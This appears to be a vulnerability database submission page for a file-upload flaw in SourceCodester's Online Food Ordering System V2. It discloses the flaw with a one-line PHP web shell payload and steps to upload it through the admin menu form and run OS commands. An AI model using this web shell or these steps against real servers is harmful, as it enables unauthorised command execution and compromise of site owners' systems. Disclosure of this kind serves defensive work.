| Título | Online Food Ordering System V2 - File Upload to OS Command Injection |
|---|
| Descrição | # Exploit Title: Online Food Ordering System V2 - File Upload to OS Command Injection
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Version: v2.0
# Tested on: Windows 11, Apache
Description:-
A File Upload Vulnerability which has been escalated to OS Command Injection in Online Food Ordering System V2 while uploading a .php file in "Menu Form" page.
`
Payload used:-
<?php system($_GET['c']); ?>
`
Parameter":-
Menu Form > Image: <?php system($_GET['c']); ?>
`
Steps to reproduce:-
1. Here we go to : http://localhost/fos/admin/index.php?page=menu
2. Now in those Parameters "Image" here we upload a php file
3. In that we put our payload "<?php system($_GET['c']); ?>" and we name it as 1.php and upload it
4. As we open in another tab we need to put our endpoint "?c=" and we can see our OS Command Injection Attack
http://localhost/fos/assets/img/1673548800_PHP_exif_system.php?c=whoami |
|---|
| Utilizador | DisguisedRoot (UID 33702) |
|---|
| Submissão | 12/01/2023 19h58 (há 3 anos) |
|---|
| Moderação | 12/01/2023 22h09 (2 hours later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 218185 [SourceCodester Online Food Ordering System 2.0 Menu Form index.php?page=menu Image Elevação de Privilégios] |
|---|
| Pontos | 17 |
|---|